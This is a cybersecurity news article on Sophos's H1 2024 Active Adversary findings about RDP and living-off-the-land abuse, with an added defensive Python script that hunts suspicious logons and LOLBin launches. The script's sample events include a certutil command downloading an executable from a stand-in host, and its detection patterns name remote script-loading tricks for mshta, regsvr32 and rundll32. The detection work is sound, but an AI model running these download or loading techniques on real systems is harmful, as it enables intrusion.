SecurityBrief Australia - Technology news for CISOs & cybersecurity decision-makers

Cybercriminals increasingly exploit trusted apps, says report

Today

The Sophos X-Ops Active Adversary Report for the first half of 2024 reveals a significant increase in cybercriminals exploiting trusted Microsoft applications on Windows networks.

The report highlights a 51% year-on-year surge in the abuse of trusted applications and binaries that already ship with Windows, the remote desktop protocol (RDP) among them. The practice is termed living off the land, and the abused executables are known as LOLBins; their abuse is up 83% since 2021.

John Shier, Field CTO at Sophos, stated, "Living-off-the-land not only offers stealth to an attacker's activities but also provides a tacit endorsement of their activities. While abusing some legitimate tools might raise a few defenders' eyebrows, and hopefully some alerts, abusing a Microsoft binary often has the opposite effect."

Shier continued, "Many of these abused Microsoft tools are integral to Windows and have legitimate uses, but it's up to system administrators to understand how they are used in their environments and what constitutes abuse. Without nuanced and contextual awareness of the environment, including continuous vigilance to new and developing events within the network, today's stretched IT teams risk missing key threat activity that often leads to ransomware."

The analysis of nearly 200 incident response cases found RDP abuse in 89% of them, continuing the trend identified in the 2023 report.
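The two findings above, RDP abuse and LOLBin abuse, are both visible in the Windows Security log: interactive RDP sessions appear as logon events (ID 4624) with logon type 10, and LOLBin launches appear as process-creation events (ID 4688) once command-line auditing is enabled. The following is an added example, not code from the Sophos report or from the article. The events are constructed samples with hypothetical hosts, users and addresses; the allowed jump-host range and the command-line patterns are assumptions a defender would tune to their own environment, and the parsing is simplified to dictionaries rather than real EVTX/XML records.

```python
"""Hunting unexpected RDP logons and LOLBin abuse in Windows Security events.

Added example. Sample events are constructed, not taken from any real environment.
Field names follow the Security log (4624 logon, 4688 process creation) but the
records are plain dicts so the logic runs offline.
"""
import re
from ipaddress import ip_address, ip_network

# Constructed sample events (hypothetical hosts, users and addresses).
EVENTS = [
    {"EventID": 4624, "TargetUserName": "admin.jsmith", "LogonType": 10,
     "IpAddress": "10.0.5.20", "Computer": "DC01"},
    {"EventID": 4624, "TargetUserName": "svc-backup", "LogonType": 10,
     "IpAddress": "10.42.9.77", "Computer": "DC01"},
    {"EventID": 4624, "TargetUserName": "jsmith", "LogonType": 2,
     "IpAddress": "-", "Computer": "WS17"},
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\certutil.exe",
     "ParentProcessName": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "certutil -urlcache -split -f http://203.0.113.5/a.txt a.exe",
     "Computer": "WS17"},
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\certutil.exe",
     "ParentProcessName": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "certutil -verify cert.cer", "Computer": "WS17"},
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\rundll32.exe",
     "ParentProcessName": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "rundll32.exe shell32.dll,Control_RunDLL", "Computer": "WS17"},
]

# Assumed jump-host subnet from which interactive RDP (logon type 10) is expected.
RDP_ALLOWED = [ip_network("10.0.5.0/24")]

# Command-line patterns that are rarely legitimate for these built-in binaries.
LOLBIN_PATTERNS = {
    "certutil.exe": re.compile(r"-urlcache|-decode|-encode", re.I),
    "mshta.exe": re.compile(r"https?:|javascript:|vbscript:", re.I),
    "regsvr32.exe": re.compile(r"/i:https?:|scrobj\.dll", re.I),
    "rundll32.exe": re.compile(r"javascript:|https?:", re.I),
    "bitsadmin.exe": re.compile(r"/transfer|/addfile", re.I),
}
# Office applications should not be spawning system utilities at all.
SUSPICIOUS_PARENTS = ("winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe")


def rdp_logons_from_unexpected_sources(events, allowed=RDP_ALLOWED):
    """Return 4624/logon-type-10 events whose source is outside the allowed ranges."""
    hits = []
    for e in events:
        if e.get("EventID") != 4624 or e.get("LogonType") != 10:
            continue
        try:
            addr = ip_address(e.get("IpAddress", "-"))
        except ValueError:
            hits.append(e)  # type-10 logon with no source address is itself odd
            continue
        if not any(addr in net for net in allowed):
            hits.append(e)
    return hits


def lolbin_abuse(events):
    """Return (reason, event) pairs for 4688 events that look like LOLBin abuse."""
    hits = []
    for e in events:
        if e.get("EventID") != 4688:
            continue
        exe = e["NewProcessName"].rsplit("\\", 1)[-1].lower()
        parent = e.get("ParentProcessName", "").rsplit("\\", 1)[-1].lower()
        pattern = LOLBIN_PATTERNS.get(exe)
        if pattern and pattern.search(e.get("CommandLine", "")):
            hits.append(("abuse-pattern", e))
        elif exe in LOLBIN_PATTERNS and parent in SUSPICIOUS_PARENTS:
            hits.append(("office-parent", e))
    return hits


if __name__ == "__main__":
    for e in rdp_logons_from_unexpected_sources(EVENTS):
        print(f"RDP from outside jump hosts: {e['TargetUserName']} <- {e['IpAddress']} on {e['Computer']}")
    for reason, e in lolbin_abuse(EVENTS):
        print(f"LOLBin {reason}: {e['CommandLine']} (parent {e['ParentProcessName']})")
```

The plain `certutil -verify` launch is deliberately left unflagged: the point Shier makes is that the binary itself is legitimate, so the signal has to come from the command line or the process lineage, not from the executable name. In a real deployment the same two functions would be fed from `Get-WinEvent` or a SIEM export rather than from the constructed list.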

The report also noted that compromised credentials remain the most common root cause of attacks, responsible for 39% of cases, down from 56% in 2023. Network breaches were the most common incident type handled by the Sophos Managed Detection and Response (MDR) team.

For the Sophos Incident Response (IR) team, the median dwell time, the interval between the start of an attack and its detection, remained approximately eight days. With MDR involvement, the median dwell time fell to one day across all incident types and three days for ransomware attacks.

Another critical finding concerned Active Directory domain controllers. The most frequently targeted versions ran Windows Server 2019, 2016 and 2012, all of which are past mainstream Microsoft support. Server 2012 is already past extended support as well, so security fixes for it are only available through paid Extended Security Updates; 2016 and 2019 remain in extended support, one stage away from end of life. Notably, 21% of the compromised AD server versions were already end-of-life.

The report also assessed the impact of law-enforcement action on ransomware groups. Despite the takedown of LockBit's main leak site and infrastructure in February 2024, LockBit remained the most frequently encountered ransomware group, responsible for approximately 21% of infections in the first half of 2024.

These findings underscore the growing challenges in cybersecurity, notably the increasing sophistication and stealth tactics employed by adversaries exploiting trusted applications within networks to carry out their attacks.
